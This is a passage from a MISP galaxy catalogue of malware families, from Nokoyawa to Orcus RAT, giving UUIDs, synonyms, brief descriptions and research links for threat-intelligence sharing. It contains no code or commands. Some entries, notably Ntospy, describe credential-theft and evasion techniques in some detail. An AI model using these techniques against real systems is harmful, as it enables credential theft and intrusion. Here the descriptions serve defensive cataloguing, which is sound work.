- https://www.sentinelone.com/labs/nokoyawa-ransomware-new-karma-nemty-variant-wears-thin-disguise/ - webarchive
- https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/ - webarchive
- https://malgamy.github.io/malware-analysis/Nokoyawa/ - webarchive
- https://www.trendmicro.com/en_us/research/22/c/nokoyawa-ransomware-possibly-related-to-hive-.html - webarchive
- https://github.com/MalGamy/YARA_Rules/blob/main/Nokoyawa.yara - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NominatusToxicBattery
A wiper that overwrites target files with a copy of itself, thus spreading in the fashion of a file-infecting virus.
Internal MISP references
UUID 2fef9561-e16f-47a9-90c6-a68a1b20cc95
which can be used as unique global reference for NominatusToxicBattery
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NOOPDOOR
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NOOPDOOR.
Known Synonyms |
---|
HiddenFace |
Internal MISP references
UUID 75850d37-317c-4211-b9cb-eb60a7ea22bd
which can be used as unique global reference for NOOPDOOR
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.noopdoor - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_2_7_hara_shoji_higashi_vickie-su_nick-dai_en.pdf - webarchive
- https://blogs.jpcert.or.jp/en/2024/07/mirrorface-attack-against-japanese-organisations.html - webarchive
- https://www.macnica.co.jp/business/security/security-reports/pdf/cyberespionage_report_2023.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nopyfy
Ransomware.
Internal MISP references
UUID 62fe621a-04aa-4b5d-95d7-c1c3e4bcd17c
which can be used as unique global reference for Nopyfy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NorthStar
An open source C2 framework intended for pentest and red teaming activities.
Internal MISP references
UUID b783b185-e05c-481b-8c04-d0ba1b745713
which can be used as unique global reference for NorthStar
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nosu
According to PCrisk, Nosu is the name of a malicious program classified as a stealer. This malware is designed to steal information from infected machines. The Nosu stealer can extract a wide variety of data from devices and installed applications. The most active campaigns associated with Nosu were noted in North and South America, as well as Southeast Asia.
Internal MISP references
UUID a67b25dd-527f-40fa-b7e0-c93e856c0a4c
which can be used as unique global reference for Nosu
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nova Stealer
Nova Stealer is a new information stealer that is offered as Malware-as-a-Service by a new French-speaking actor called "Nova Sentinel". Its capabilities include password stealing, browser injections, crypto wallet stealing, Discord injections, and screen recordings. Parts of its source code have been made available on GitHub, with certain "Premium" features missing.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nova Stealer.
Known Synonyms |
---|
Malicord |
Internal MISP references
UUID fd09577f-18f4-4635-83d8-b64b9e3253f1
which can be used as unique global reference for Nova Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NoxPlayer
Internal MISP references
UUID a077c784-6bc5-488d-b844-978d8d081390
which can be used as unique global reference for NoxPlayer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.noxplayer - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf - webarchive
- https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nozelesn (Decryptor)
Internal MISP references
UUID 6207668d-af17-44a6-97a2-e1b448264529
which can be used as unique global reference for Nozelesn (Decryptor)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
No-Justice
Internal MISP references
UUID 26d37e90-7061-4785-a9cf-4302d0a7dc6b
which can be used as unique global reference for No-Justice
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
nRansom
Internal MISP references
UUID b9c767c7-a1e8-476a-8032-9686d51df7de
which can be used as unique global reference for nRansom
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom - webarchive
- https://twitter.com/malwrhunterteam/status/910952333084971008 - webarchive
- https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/ - webarchive
- https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NSPX30
Internal MISP references
UUID 7c67248b-d655-44ff-a69b-431bf139d373
which can be used as unique global reference for NSPX30
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nspx30 - webarchive
- https://blog.sonicwall.com/en-us/2024/01/blackwood-apt-group-has-a-new-dll-loader/ - webarchive
- https://www.welivesecurity.com/en/eset-research/nspx30-sophisticated-aitm-enabled-implant-evolving-since-2005/ - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_1_2_facundo_en.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ntospy
Ntospy is a credential stealer leveraging a well-established technique of abusing the Windows Network Provider interface, a method documented as early as 2004 and exemplified by tools like NPPSpy. Posing as a legitimate Network Provider DLL, Ntospy injects itself into the Windows authentication process, hijacking login attempts to harvest user credentials. It achieves this by registering a malicious Network Provider, typically named "credman," which intercepts authentication requests and redirects them to its malicious DLL.
Instead of immediately exfiltrating the stolen data, Ntospy employs a form of local storage, writing the captured credentials in cleartext to files disguised as harmless Microsoft Update packages using the .msu file extension. These files are often planted in system directories with believable names like "c:/programdata/package cache/windows10.0-kb5009543-x64.msu," further masking their malicious purpose.
Adding to its stealth, Ntospy incorporates obfuscation techniques to evade detection. This includes using seemingly innocuous filenames for its DLL, often mimicking critical system files like "ntoskrnl.dll" to blend in. Some variants even go a step further by encrypting the credential storage file path within the DLL, requiring analysis and decryption to uncover its full functionality.
Internal MISP references
UUID 5afd0fe6-26fe-4b90-b48e-0cb0dfb76fdf
which can be used as unique global reference for Ntospy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NuggetPhantom
NSFOCUS describes PhantomNugget as a modularized malware toolkit that was spread using EternalBlue. Payloads included a RAT and an XMRig miner.
Internal MISP references
UUID 25a5ded7-6167-4f9a-b55d-9cfc9a9a9f22
which can be used as unique global reference for NuggetPhantom
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nullmixer
Nullmixer is a dropper/loader for additional malware. It is known to drop a vast amount of different malware, such as info stealers, RATs and additional loaders. Samples observed contained up to 8 additional payloads.
Internal MISP references
UUID 430c92f4-95b4-4b1c-813a-46d3e53a0d1e
which can be used as unique global reference for Nullmixer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nullmixer - webarchive
- https://www.youtube.com/watch?v=92jKJ_G_6ho - webarchive
- https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1 - webarchive
- https://www.youtube.com/watch?v=yLQfDk3dVmA - webarchive
- https://www.youtube.com/watch?v=v_K_zoPGpdk - webarchive
- https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Numando
According to PCrisk, Numando is a banking trojan written in the Delphi programming language. As the malicious program's classification implies, it is designed to steal banking information. Numando primarily targets Brazil, with occasional campaigns occurring in Mexico and Spain.
Internal MISP references
UUID 69d63487-6200-4f71-845e-df3997402b00
which can be used as unique global reference for Numando
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NVISOSPIT
Internal MISP references
UUID 83cfa206-b485-47fd-b298-1b008ab86507
which can be used as unique global reference for NVISOSPIT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nvisospit - webarchive
- https://twitter.com/Bank_Security/status/1134850646413385728 - webarchive
- https://twitter.com/r3c0nst/status/1135606944427905025 - webarchive
- http://www.isg.rhul.ac.uk/dl/weekendconference2014/slides/Erik_VanBuggenhout.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
N-W0rm
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular N-W0rm.
Known Synonyms |
---|
NWorm |
nw0rm |
Internal MISP references
UUID bdc00b3a-2ceb-4818-83fa-96fb11c8540f
which can be used as unique global reference for N-W0rm
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nymaim
Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nymaim.
Known Synonyms |
---|
nymain |
Internal MISP references
UUID 9b5255c6-44e5-4ec3-bc03-7e00e220c937
which can be used as unique global reference for Nymaim
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim - webarchive
- https://www.lawfareblog.com/what-point-these-nation-state-indictments - webarchive
- https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0 - webarchive
- https://www.sentinelone.com/blog/goznym-banking-malware-gang-busted/ - webarchive
- https://www.justice.gov/opa/pr/goznym-cyber-criminal-network-operating-out-europe-targeting-american-entities-dismantled - webarchive
- https://www.shadowserver.org/news/goznym-indictments-action-following-on-from-successful-avalanche-operations/ - webarchive
- https://www.virusbulletin.com/conference/vb2017/abstracts/linking-xpaj-and-nymaim - webarchive
- https://www2.deloitte.com/content/dam/Deloitte/us/Documents/risk/us-aers-the-evolution-of-the-nymaim-criminal-enterprise.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded - webarchive
- https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/ - webarchive
- https://securityintelligence.com/posts/goznym-closure-comes-in-the-shape-of-a-europol-and-doj-arrest-operation/ - webarchive
- https://www.cert.pl/en/news/single/nymaim-revisited/ - webarchive
- https://blog.talosintelligence.com/goznym/ - webarchive
- https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/ - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim - webarchive
- https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf - webarchive
- https://bitbucket.org/daniel_plohmann/idapatchwork - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nymaim2
According to bin.re, in April 2018 a new version of Nymaim appeared that dropped the previous obfuscation and uses a new wordlist-based DGA (Domain Generation Algorithm).
Internal MISP references
UUID c8e8392f-883e-412e-9b0b-02137d0875da
which can be used as unique global reference for Nymaim2
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Nyxem
Internal MISP references
UUID d36a3223-5952-48c9-b2dc-87533fa032dc
which can be used as unique global reference for Nyxem
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OATBOAT
OATBOAT is a loader that loads and executes shellcode payloads.
Internal MISP references
UUID 42222769-e215-41bc-b550-c878403c9d75
which can be used as unique global reference for OATBOAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Oblique RAT
Internal MISP references
UUID 33c138a0-85d3-4497-90e9-ada1d501a100
which can be used as unique global reference for Oblique RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.oblique_rat - webarchive
- https://brandefense.io/blog/apt-36-campaign-poseidon-malware-technical-analysis/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf - webarchive
- https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html - webarchive
- https://www.secrss.com/articles/24995 - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/ - webarchive
- https://securelist.com/transparent-tribe-part-2/98233/ - webarchive
- https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html - webarchive
- https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html - webarchive
- https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html - webarchive
- https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Obscene
Internal MISP references
UUID 8f623a37-80a4-4240-9586-6ea7a2a97e30
which can be used as unique global reference for Obscene
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ObserverStealer
Internal MISP references
UUID 9ddbf63f-c9a2-4bd6-8449-189f2d2ce5e4
which can be used as unique global reference for ObserverStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OCEANMAP
Internal MISP references
UUID 6e33d8cd-f8aa-4be4-9619-867a469a1425
which can be used as unique global reference for OCEANMAP
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.oceanmap - webarchive
- https://thehackernews.com/2024/03/apt28-hacker-group-targeting-europe.html?m=1 - webarchive
- https://harfanglab.io/en/insidethelab/compromised-routers-infrastructure-target-europe-caucasus/ - webarchive
- https://cert.gov.ua/article/6276894 - webarchive
- https://medium.com/@knight0x07/analyzing-apt28s-oceanmap-backdoor-exploring-its-c2-server-artifacts-db2c3cb4556b - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Oceansalt
Internal MISP references
UUID 01cef4e7-a8a8-4b42-b509-f91c5d415354
which can be used as unique global reference for Oceansalt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Octopus (Windows)
Internal MISP references
UUID 777b76f9-5390-4899-b201-ebaa8a329c96
which can be used as unique global reference for Octopus (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.octopus - webarchive
- https://isc.sans.edu/diary/26918 - webarchive
- https://mp.weixin.qq.com/s/v1gi0bW79Ta644Dqer4qkw - webarchive
- https://www.prodaft.com/m/reports/PAPERBUG_TLPWHITE-1.pdf - webarchive
- https://securelist.com/octopus-infested-seas-of-central-asia/88200/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OddJob
Internal MISP references
UUID d8305201-9fec-4e6b-9eec-7ebb756364e2
which can be used as unique global reference for OddJob
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Oderoor
Spam bot that was active from around 2007 onward; one of the first malware families to use a domain generation algorithm.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Oderoor.
Known Synonyms |
---|
Bobax |
Kraken |
Internal MISP references
UUID fb5c1af2-9028-47c7-937b-ab0ba0078485
which can be used as unique global reference for Oderoor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.oderoor - webarchive
- https://web.archive.org/web/20160324035554/https://www.johannesbader.ch/2015/12/krakens-two-domain-generation-algorithms// - webarchive
- https://bin.re/blog/krakens-two-domain-generation-algorithms/ - webarchive
- https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Odinaff
Internal MISP references
UUID 045df65f-77fe-4880-af34-62ca33936c6e
which can be used as unique global reference for Odinaff
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff - webarchive
- https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks - webarchive
- https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Okrum
A new, previously unknown backdoor that we named Okrum. The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors.
Internal MISP references
UUID af2e4e0d-e8ae-48a9-aac4-2a49242c68d2
which can be used as unique global reference for Okrum
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.okrum - webarchive
- https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/ - webarchive
- https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/ - webarchive
- https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/ - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OLDBAIT
According to FireEye, OLDBAIT is a credential stealer that has been observed to be used by APT28. It targets Internet Explorer, Mozilla Firefox, Eudora, The Bat! (an email client by a Moldovan company), and Becky! (an email client made by a Japanese company). It can use either HTTP or SMTP to exfiltrate data. In some places it is mistakenly named "Sasfis", which however seems to be a completely different and unrelated malware family.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular OLDBAIT.
Known Synonyms |
---|
Sasfis |
Internal MISP references
UUID b79a6b61-f122-4823-a4ab-bbab89fcaf75
which can be used as unique global reference for OLDBAIT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Olympic Destroyer
Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Olympic Destroyer.
Known Synonyms |
---|
SOURGRAPE |
Internal MISP references
UUID f3ba8a50-0105-4aa9-90b2-01df15f50b28
which can be used as unique global reference for Olympic Destroyer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer - webarchive
- https://www.youtube.com/watch?v=wCv9SiSA7Sw - webarchive
- http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html - webarchive
- https://securelist.com/the-devils-in-the-rich-header/84348/ - webarchive
- http://blog.talosintelligence.com/2018/02/olympic-destroyer.html - webarchive
- https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat - webarchive
- https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/ - webarchive
- https://attack.mitre.org/groups/G0034 - webarchive
- https://www.youtube.com/watch?v=rjA0Vf75cYk - webarchive
- https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf - webarchive
- https://www.lastline.com/labsblog/attribution-from-russia-with-code/ - webarchive
- https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf - webarchive
- https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/ - webarchive
- https://www.wired.com/story/untold-story-2018-olympics-destroyer-cyberattack/ - webarchive
- https://www.mbsd.jp/blog/20180215.html - webarchive
- https://www.youtube.com/watch?v=1jgdMY12mI8 - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://securelist.com/olympic-destroyer-is-still-alive/86169/ - webarchive
- https://www.youtube.com/watch?v=a4BZ3SZN-CI - webarchive
- https://www.lastline.com/labsblog/olympic-destroyer-south-korea/ - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights - webarchive
- https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/ - webarchive
- https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ondritols
According to Symantec, this malware has been deployed against IT services companies in the U.S. and Europe. It is a multi-stage backdoor: the first stage is a downloader that authenticates to the Microsoft Graph API, downloads the second-stage payload from OneDrive and executes it. The main payload will download a publicly available file from GitHub. It will then create a folder in OneDrive named deviceId_n_
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ondritols.
Known Synonyms |
---|
Onedrivetools |
Internal MISP references
UUID ae7da05e-0ea6-4a9d-a0fa-8bfe9c74a20c
which can be used as unique global reference for Ondritols
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ONHAT
Internal MISP references
UUID 82733125-da67-44ff-b2ac-b16226088211
which can be used as unique global reference for ONHAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Oni
Ransomware.
Internal MISP references
UUID c182f370-4721-4968-a3b1-a7e96ab876df
which can be used as unique global reference for Oni
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OnionDuke
OnionDuke is a sophisticated piece of malware, distributed by threat actors through a malicious exit node on the Tor anonymity network, that appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites.
Internal MISP references
UUID abd10caa-7d4c-4c22-8dae-8d32f13232d7
which can be used as unique global reference for OnionDuke
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke - webarchive
- https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/ - webarchive
- https://blog.f-secure.com/podcast-dukes-apt29/ - webarchive
- https://www.f-secure.com/weblog/archives/00002764.html - webarchive
- http://contagiodump.blogspot.com/2014/11/onionduke-samples.html - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-hemlock - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OnlinerSpambot
A spambot that has been observed being used for spreading Ursnif, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular OnlinerSpambot.
Known Synonyms |
---|
Onliner |
SBot |
Internal MISP references
UUID 6cf05dad-86c8-4f46-b5b8-0a004360563f
which can be used as unique global reference for OnlinerSpambot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner - webarchive
- https://outpost24.com/blog/an-analysis-of-a-spam-distribution-botnet - webarchive
- https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html - webarchive
- https://www.blueliv.com/blog/research/analysis-spam-distribution-botnet-onliner-spambot/ - webarchive
- https://benkowlab.blogspot.com/2017/08/from-onliner-spambot-to-millions-of.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OopsIE
Internal MISP references
UUID d07c3def-91af-4d9b-bdf7-62c9e0b44968
which can be used as unique global reference for OopsIE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie - webarchive
- https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/ - webarchive
- https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/evasive-serpens/ - webarchive
- https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr - webarchive
- https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Opachki
Internal MISP references
UUID f50de0a8-35a7-406e-9f53-8f7d5448e1e7
which can be used as unique global reference for Opachki
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki - webarchive
- https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519 - webarchive
- http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html - webarchive
- https://forum.malekal.com/viewtopic.php?t=21806 - webarchive
- http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OpcJacker
Internal MISP references
UUID 22f732f4-efcf-4eb5-8c51-8338dfd33297
which can be used as unique global reference for OpcJacker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OpenSUpdater
Internal MISP references
UUID 03d44ec8-ebb4-4d90-9773-c11f4a7de074
which can be used as unique global reference for OpenSUpdater
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OpenCarrot
Internal MISP references
UUID 7fb5882e-1682-45d3-9dfb-204e6c1ca4c9
which can be used as unique global reference for OpenCarrot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OpGhoul
This entry serves as a placeholder of malware observed during Operation Ghoul. The samples will likely be assigned to their respective families. Some families involved and identified were Alina POS (Katrina variant) and TreasureHunter POS.
Internal MISP references
UUID 25a280b2-0260-4593-bf8c-7062dfdc6c38
which can be used as unique global reference for OpGhoul
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul - webarchive
- https://securelist.com/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/75718/ - webarchive
- https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OpBlockBuster
Internal MISP references
UUID 25c962c5-5616-4fe3-ad44-68c4ac4c726d
which can be used as unique global reference for OpBlockBuster
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ORANGEADE
FireEye details ORANGEADE as a dropper for the CREAMSICLE malware.
Internal MISP references
UUID 092262b0-c631-400d-9f38-017cd59a14fd
which can be used as unique global reference for ORANGEADE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
OrcaRAT
OrcaRAT is a backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands and to download/upload a file, among other actions.
Internal MISP references
UUID 08103f1c-f83d-4037-a1ae-109b06f79226
which can be used as unique global reference for OrcaRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Orchard
A malware generating DGA domains seeded by the Bitcoin Genesis Block. This family has strong code overlap with win.victorygate.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Orchard.
Known Synonyms |
---|
Antavmu |
Internal MISP references
UUID 094159e7-cc4f-4c47-b24e-b0a32ba23a58
which can be used as unique global reference for Orchard
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.orchard - webarchive
- https://blog.netlab.360.com/a-new-botnet-orchard-generates-dga-domains-with-bitcoin-transaction-information/ - webarchive
- https://malverse.it/stack-string-decryptor-con-ghidra-emulator-orchard - webarchive
- https://bin.re/blog/a-dga-seeded-by-the-bitcoin-genesis-block/ - webarchive
- https://blog.netlab.360.com/orchard-dga/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Orcus RAT
Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real time.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Orcus RAT.
Known Synonyms |
---|
Schnorchel |
Internal MISP references
UUID c41e7fdd-f1b1-4b87-97d7-634202af8b61
which can be used as unique global reference for Orcus RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat - webarchive
- https://assets.virustotal.com/reports/2021trends.pdf - webarchive
- https://any.run/cybersecurity-blog/orcus-rat-malware-analysis/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks - webarchive
